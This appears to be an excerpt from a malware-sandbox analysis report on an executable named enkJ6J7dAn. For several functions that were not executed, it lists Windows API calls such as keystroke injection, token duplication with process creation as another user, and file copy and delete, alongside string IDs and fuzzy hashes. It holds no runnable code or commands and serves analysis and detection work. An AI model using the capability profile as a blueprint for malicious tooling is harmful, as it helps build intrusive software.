                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction ID: 6d066c4fa666f5120bb93ea68dbc4bb4180ea73334f820e9a3bcbf2720422304
                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                    • Instruction Fuzzy Hash: 79E0E67494010DDFDB00EFB4D54969D7BF4EF04301F104561FD01D2281DA309D508A62

                                                                                                                    Non-executed Functions

                                                                                                                    Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                                    • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                                    • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                                    • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                                    • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                                    • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                                    • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                                    • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                                    • SendMessageW.USER32 ref: 0047CA7F
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                                    • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00930360,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                                    • ImageList_BeginDrag.COMCTL32(00930360,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                                    • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                                    • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                                    • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                                    • SendMessageW.USER32 ref: 0047CD12
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                                    • SendMessageW.USER32 ref: 0047CD80
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                                    • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                                    • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                                    • SendMessageW.USER32 ref: 0047CE93
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,03071B28,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                                    • SendMessageW.USER32 ref: 0047CF6B
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,03071B28,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                    • String ID: @GUI_DRAGID$F
                                                                                                                    • API String ID: 3100379633-4164748364
                                                                                                                    • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                    • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                                    • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                    • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                                    Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32 ref: 00434420
                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                                    • IsIconic.USER32(?), ref: 0043444F
                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 2889586943-2988720461
                                                                                                                    • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                    • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                                    • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                    • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                                    Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                                    • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                                    • _wcslen.LIBCMT ref: 00446498
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                                    • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                                    • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                                    • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                                    • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                                    • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                                    • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                                    • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                                    • String ID: $@OH$default$winsta0
                                                                                                                    • API String ID: 3324942560-3791954436
                                                                                                                    • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                                    • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                                    • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                                    • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                                    Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                      • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                      • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                                                                      • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                    • _wcscat.LIBCMT ref: 0044BD94
                                                                                                                    • _wcscat.LIBCMT ref: 0044BDBD
                                                                                                                    • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                                                                    • _wcscpy.LIBCMT ref: 0044BE71
                                                                                                                    • _wcscat.LIBCMT ref: 0044BE83
                                                                                                                    • _wcscat.LIBCMT ref: 0044BE95
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 2188072990-1173974218
                                                                                                                    • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                                    • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                                                    • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                                    • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                                                                    Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                                    • __swprintf.LIBCMT ref: 004789D3
                                                                                                                    • __swprintf.LIBCMT ref: 00478A1D
                                                                                                                    • __swprintf.LIBCMT ref: 00478A4B
                                                                                                                    • __swprintf.LIBCMT ref: 00478A79
                                                                                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                                    • __swprintf.LIBCMT ref: 00478AA7
                                                                                                                    • __swprintf.LIBCMT ref: 00478AD5
                                                                                                                    • __swprintf.LIBCMT ref: 00478B03
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                    • API String ID: 999945258-2428617273
                                                                                                                    • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                    • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                                    • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                    • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                                    Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                    • __wsplitpath.LIBCMT ref: 00403492
                                                                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                    • _wcscpy.LIBCMT ref: 004034A7
                                                                                                                    • _wcscat.LIBCMT ref: 004034BC
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                                    • _wcscpy.LIBCMT ref: 004035A0
                                                                                                                    • _wcslen.LIBCMT ref: 00403623
                                                                                                                    • _wcslen.LIBCMT ref: 0040367D
                                                                                                                    Strings
                                                                                                                    • Unterminated string, xrefs: 00428348
                                                                                                                    • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                                    • Error opening the file, xrefs: 00428231
                                                                                                                    • _, xrefs: 0040371C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                    • API String ID: 3393021363-188983378
                                                                                                                    • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                                    • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                                    • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                                    • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                                    Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                    • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                    • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                                    • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                    • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                                    Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                                    • __swprintf.LIBCMT ref: 00431C2E
                                                                                                                    • _wcslen.LIBCMT ref: 00431C3A
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                    • API String ID: 2192556992-3457252023
                                                                                                                    • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                    • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                                    • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
